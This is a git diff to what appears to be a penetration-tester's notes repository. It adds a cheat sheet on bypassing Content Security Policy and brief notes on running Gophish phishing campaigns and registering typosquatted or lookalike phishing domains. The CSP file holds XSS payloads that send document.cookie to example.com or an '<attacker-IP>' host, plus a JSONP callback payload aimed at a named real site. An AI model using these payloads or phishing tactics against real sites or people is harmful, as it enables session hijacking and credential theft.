diff --git a/.gitmodules b/.gitmodules
index e09a84c..1981ec3 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -67,3 +67,6 @@
 [submodule "forensics/volatility"]
 	path = forensics/volatility
 	url = https://github.com/volatilityfoundation/volatility.git
+[submodule "exploit/web/content_security_policy/JSONBee"]
+	path = exploit/web/content_security_policy/JSONBee
+	url = https://github.com/zigoo0/JSONBee.git
diff --git a/exploit/web/content_security_policy/JSONBee b/exploit/web/content_security_policy/JSONBee
new file mode 160000
index 0000000..1a518dd
--- /dev/null
+++ b/exploit/web/content_security_policy/JSONBee
@@ -0,0 +1 @@
+Subproject commit 1a518ddf695ae3093ff637c5958802715e890d88
diff --git a/exploit/web/content_security_policy/content_security_policy.md b/exploit/web/content_security_policy/content_security_policy.md
new file mode 100644
index 0000000..9094c83
--- /dev/null
+++ b/exploit/web/content_security_policy/content_security_policy.md
@@ -0,0 +1,52 @@
+# Content Security Policy (CSP)
+
+* Either in HTTP header or inside DOM's HTML 
+* [CSP directives](https://content-security-policy.com/#directive)
+* [CSP evaluator](https://csp-evaluator.withgoogle.com/)
+* [Bypassing csp](https://blog.0daylabs.com/2016/09/09/bypassing-csp/)
+
+## Sources
+* `*` wildcard 
+* `none`
+* `self` for sources delivered through the same protocol
+    * `default-src 'self';` may not load any script
+* `unsafe-inline`
+* `unsafe-eval` 
+* `test.com` loads resources from domain but not subdomains
+* `*.test.com` loads resources from subdomains
+* `data:<content-type>...` critical usage
+* `nonce` loads if nonce is correct. `sha256`, `sha384`, `sha512`
+    * [style hasher](https://report-uri.com/home/hash)
+
+## Usage 
+
+### JSONP
+Find JSONP endpoints through which to use custom callback functions
+* [JSONBee](https://github.com/zigoo0/JSONBee)
+```sh
+"><script+src="https://bebezoo.1688.com/fragment/index.htm?callback=alert(1337)"></script>
+```
+
+### Misconfiguration
+Insert payload into `src` attribute
+
+### Exfiltration
+* [Beeceptor](beeceptor.com)
+* Local webserver
+* `connect-src` while Ajax/XHR requests are enabled
+* Disguising as an `image-src` or `media-src` source
+```html
+<script>(new Image()).src = `https://example.com/${encodeURIComponent(document.cookie)}`</script>
+```
+other payloads
+```sh
+<link id="csp" rel=stylesheet href="" /><script nonce="abcdef">document.getElementById("csp").href="http://<attacker-IP>:8000/" + document.cookie;</script>
+```
+* 
+```sh
+<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.3/prototype.min.js" integrity="sha512-C4LuwXQtQOF1iTRy3zwClYLsLgFLlG8nCV5dCxDjPcWsyFelQXzi3efHRjptsOzbHwwnXC3ZU+sWUh1gmxaTBA==" crossorigin="anonymous"></script>
+<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.2/angular.min.js"></script>
+<div ng-app ng-csp>
+{{$on.curry.call().document.location='https://<attacker-IP>/' + $on.curry.call().document.cookie}}
+</div>
+```
diff --git a/osint/social_engineering/gophish.md b/osint/social_engineering/gophish.md
new file mode 100644
index 0000000..9bc9ef0
--- /dev/null
+++ b/osint/social_engineering/gophish.md
@@ -0,0 +1,12 @@
+# Gophish
+
+* [Repo](https://github.com/gophish/gophish.git)
+
+## Usage
+
+* Create 
+    * Send profile
+    * Landing page
+    * Email templates
+    * User groups
+    * New Campaign
diff --git a/osint/social_engineering/phishing_domain.md b/osint/social_engineering/phishing_domain.md
new file mode 100644
index 0000000..5ddf071
--- /dev/null
+++ b/osint/social_engineering/phishing_domain.md
@@ -0,0 +1,5 @@
+# Phishing Domains
+
+* Use an old, unused domain.
+* Typosquatting, register a similar domain.
+* Use similar looking chars from unicode.